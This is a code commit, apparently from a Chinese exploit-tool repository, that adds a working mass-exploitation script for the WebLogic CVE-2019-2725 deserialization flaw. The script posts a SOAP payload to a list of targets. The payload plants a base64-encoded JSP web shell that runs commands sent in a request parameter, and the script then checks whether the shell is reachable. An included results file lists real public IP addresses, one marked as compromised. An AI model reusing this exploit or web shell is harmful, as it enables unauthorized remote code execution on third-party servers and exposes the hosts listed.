CVE-2019-2725

Author: No4l

CVE-2019-2725/domain.txt

@@ -0,0 +1 @@
+http://www.baidu.com

CVE-2019-2725/main.py

@@ -0,0 +1,116 @@
+# -*- coding: utf-8 -*-
+#!/usr/bin/env python3
+from time import sleep
+import threading
+import requests
+import sys
+
+##存在漏洞的路径，如果存在该路径则很大可能存在漏洞
+Path = '/_async/AsyncResponseService'
+WebSehll = '/_async/webshells.jsp'
+
+##Payload
+Headers = {
+    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0',
+    'Content-Type': 'text/xml'
+}
+
+Data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
+<soapenv:Header>
+<wsa:Action>xx</wsa:Action>
+<wsa:RelatesTo>xx</wsa:RelatesTo>
+<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+<void class="java.lang.ProcessBuilder">
+<array class="java.lang.String" length="3">
+<void index="0">
+<string>/bin/bash</string>
+</void>
+<void index="1">
+<string>-c</string>
+</void>
+<void index="2">
+<string>echo PCUKICAgIGlmKCIxMjMiLmVxdWFscyhyZXF1ZXN0LmdldFBhcmFtZXRlcigicHdkIikpKXsKICAgICAgICBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7CiAgICAgICAgaW50IGEgPSAtMTsgICAgICAgICAgCiAgICAgICAgYnl0ZVtdIGIgPSBuZXcgYnl0ZVsxMDI0XTsgICAgICAgICAgCiAgICAgICAgb3V0LnByaW50KCI8cHJlPiIpOyAgICAgICAgICAKICAgICAgICB3aGlsZSgoYT1pbi5yZWFkKGIpKSE9LTEpewogICAgICAgICAgICBvdXQucHJpbnRsbihuZXcgU3RyaW5nKGIpKTsgICAgICAgICAgCiAgICAgICAgfQogICAgICAgIG91dC5wcmludCgiPC9wcmU+Iik7CiAgICB9IAogICAgJT4= |base64 -d > servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshells.jsp</string>
+</void>
+</array>
+<void method="start"/></void>
+</work:WorkContext>
+</soapenv:Header>
+<soapenv:Body>
+<asy:onAsyncDelivery/>
+</soapenv:Body></soapenv:Envelope>'''
+
+
+def printInfo():
+    print('Usage: Python main.py filename')
+
+def urlHeadle(url):
+    if url.find('http')==0:
+        return url.strip()
+    else:
+        return 'http://'+url.strip()
+
+def start(file):
+    urls = []
+    with open(file) as f:
+        for i in f.readlines():
+            urls.append(urlHeadle(i))
+    threads = []
+    for i in urls:
+        t = threading.Thread(target=run,args=(i,))
+        threads.append(t)
+
+    for t in threads:
+        t.setDaemon(True)
+        t.start()
+        sleep(0.5)
+
+    t.join()
+
+def run(url):
+    try:
+        res = requests.get(url+Path,timeout=1)
+        status = res.status_code
+    except:
+        status = 'XXX'
+
+    if status != 200:
+        message = '[-]'+url+' may be not available,response code: '+str(status)
+        print(message)
+    else:
+        try:
+            res = requests.post(url+Path,data=Data,headers=Headers,timeout=1)
+        except:
+            status = 'XXX'
+            message = 'put webshell error'
+        if status == 'XXX':
+            print('[-]'+url,message)
+        else:
+            try:
+                res = requests.get(url+WebSehll,timeout=1)
+                status = res.status_code
+            except:
+                status = 'XXX'
+                message = 'connect error'
+            if  status == 200:
+                message = 'congratulations get shell'
+                print('[+]'+url,message)
+            else:
+                print('[-]'+url,message)
+    with open('result.csv','a') as wf:
+        wf.write(url+','+message+','+str(status))
+
+
+
+
+
+if __name__ == '__main__':
+    try:
+        file = sys.argv[1]
+    except:
+        printInfo()
+        exit()
+
+    start(file)
+
+
+    #         requests.post(i.strip()+Path,data=Data,headers=Headers)

CVE-2019-2725/readme.md

@@ -0,0 +1,7 @@
+### CVE-2019-2725
+Weblogic wls9_async_response 反序列化RCE
+```cmd
+usage:
+  python main.py domain.txt
+```
+结果保存在result.csv中

CVE-2019-2725/result.csv

@@ -0,0 +1 @@
+http://47.106.125.183:7001,congratulations get shell,200http://211.140.178.45:8443,[-]http://211.140.178.45:8443 may be not available,response code: XXX,XXXhttp://211.140.178.29:8443,[-]http://211.140.178.29:8443 may be not available,response code: 404,404http://211.140.178.34:8443,[-]http://211.140.178.34:8443 may be not available,response code: 404,404http://211.140.178.41:8443,[-]http://211.140.178.41:8443 may be not available,response code: 404,404http://211.140.178.45:8443,[-]http://211.140.178.45:8443 may be not available,response code: XXX,XXXhttp://211.140.178.47:8443,[-]http://211.140.178.47:8443 may be not available,response code: 404,404http://211.140.178.48:8443,[-]http://211.140.178.48:8443 may be not available,response code: 404,404http://211.140.178.52:8443,[-]http://211.140.178.52:8443 may be not available,response code: 404,404http://211.140.178.58:8443,[-]http://211.140.178.58:8443 may be not available,response code: 404,404http://211.140.178.6:8443,[-]http://211.140.178.6:8443 may be not available,response code: 404,404http://211.140.178.60:8443,[-]http://211.140.178.60:8443 may be not available,response code: 404,404http://211.140.178.61:8443,[-]http://211.140.178.61:8443 may be not available,response code: 404,404http://211.140.178.64:8443,[-]http://211.140.178.64:8443 may be not available,response code: 404,404http://211.140.178.67:8443,[-]http://211.140.178.67:8443 may be not available,response code: 404,404http://211.140.178.74:8443,[-]http://211.140.178.74:8443 may be not available,response code: 404,404http://211.140.179.101:8443,[-]http://211.140.179.101:8443 may be not available,response code: 404,404http://211.140.179.117:8443,[-]http://211.140.179.117:8443 may be not available,response code: 404,404http://211.140.179.12:8443,[-]http://211.140.179.12:8443 may be not available,response code: 404,404http://211.140.179.120:8443,[-]http://211.140.179.120:8443 may be not available,response code: 404,404http://211.140.179.124:8443,[-]http://211.140.179.124:8443 may be not available,response code: 404,404http://211.140.179.129:8443,[-]http://211.140.179.129:8443 may be not available,response code: 404,404http://211.140.179.140:8443,[-]http://211.140.179.140:8443 may be not available,response code: 404,404http://211.140.179.141:8443,[-]http://211.140.179.141:8443 may be not available,response code: 404,404http://211.140.179.145:8443,[-]http://211.140.179.145:8443 may be not available,response code: 404,404http://211.140.179.147:8443,[-]http://211.140.179.147:8443 may be not available,response code: 404,404http://211.140.179.153:8443,[-]http://211.140.179.153:8443 may be not available,response code: 404,404http://211.140.179.160:8443,[-]http://211.140.179.160:8443 may be not available,response code: 404,404http://211.140.179.177:8443,[-]http://211.140.179.177:8443 may be not available,response code: 404,404http://211.140.179.187:8443,[-]http://211.140.179.187:8443 may be not available,response code: 404,404http://211.140.179.189:8443,[-]http://211.140.179.189:8443 may be not available,response code: 404,404http://211.140.179.19:8443,[-]http://211.140.179.19:8443 may be not available,response code: 404,404http://211.140.179.191:8443,[-]http://211.140.179.191:8443 may be not available,response code: 404,404http://211.140.179.192:8443,[-]http://211.140.179.192:8443 may be not available,response code: 404,404http://211.140.179.199:8443,[-]http://211.140.179.199:8443 may be not available,response code: 404,404http://211.140.179.203:8443,[-]http://211.140.179.203:8443 may be not available,response code: 404,404http://211.140.179.205:8443,[-]http://211.140.179.205:8443 may be not available,response code: 404,404http://211.140.179.206:8443,[-]http://211.140.179.206:8443 may be not available,response code: 404,404http://59.16.120.55:7001,[-]http://59.16.120.55:7001 may be not available,response code: XXX,XXX

readme.txt

@@ -20,3 +20,5 @@ CNVD:
   指纹识别，add error json
 2019/4/27
   Web Title
+2019/4/28
+  CVE-2019-2725